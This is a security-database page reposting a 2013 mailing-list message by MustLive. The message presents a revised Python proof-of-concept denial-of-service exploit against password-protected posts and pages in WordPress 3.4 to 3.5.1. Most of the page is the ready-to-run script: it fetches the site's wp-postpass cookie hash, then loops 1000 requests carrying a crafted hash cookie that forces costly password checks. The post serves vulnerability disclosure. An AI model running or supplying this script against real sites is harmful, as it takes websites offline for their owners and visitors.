Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29516
HistoryJul 08, 2013 - 12:00 a.m.

WordPress Denial of Service exploit

2013-07-0800:00:00
vulners.com
11
JSON

Hello 3APA3A!

Here is my version of vnd's PoC (https://vndh.net/note:wordpress-351-denial-service). This exploit is for Denial of Service vulnerability in WordPress 3.4 - 3.5.1. My version solves some issues in original PoC.

Concerning this Denial of Service in WordPress. As I wrote last week in my post concerning release of WordPress 3.5.2, this issue concerns both posts and pages which are password protected. Not only posts as vnd wrote and similarly WP guys wrote at their site (in WP 3.5.2 announcement and in the codex). Since WordPress supports password at both posts and pages, as I wrote in 2010 concerning Brute Force and Insufficient Authorization vulnerabilities in WordPress (http://www.securityfocus.com/archive/1/510274).

wordpress-dos.py

WordPress Denial of Service exploit

WordPress 3.4 - 3.5.1

Author: vnd at vndh.net

Version by MustLive (http://websecurity.com.ua)

import httplib
import re

def get_cookie_hash(hostname, url):
headers = {'Content-type': 'application/x-www-form-urlencoded'}
handler = httplib.HTTPConnection(hostname)
handler.request('POST', url, 'post_password=', headers=headers)
response = handler.getresponse()
set_cookie = response.getheader('set-cookie')
if set_cookie is None: raise RuntimeError('cannot fetch set-cookie header')

pattern = re.compile('wp-postpass_([0-9a-f]{32})')
result = pattern.search(set_cookie)
if result is None: raise RuntimeError('cannot fetch cookie hash')
return result.groups()[0]

def send_request(hostname, post, cookie_name):
headers = {'Cookie': 'wp-postpass_%s=%%24P%%24Spaddding' % cookie_name}
handler = httplib.HTTPConnection(hostname)
handler.request('GET', post, 'action=postpass&post_password=a', headers=headers)

if name == 'main':
hostname = 'site'
posturl = '/?p=4' # link to password protected post or page
requests = 1000

pattern = re.compile('(.+/)')
url = pattern.search(posturl).groups()[0] + 'wp-pass.php'
cookie_hash = get_cookie_hash(hostname, url)
print '[+] received cookie hash: %s' % cookie_hash
for i in xrange(requests):
    print '[+] sending request %d...' % (i + 1)
    send_request(hostname, posturl, cookie_hash)

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

JSON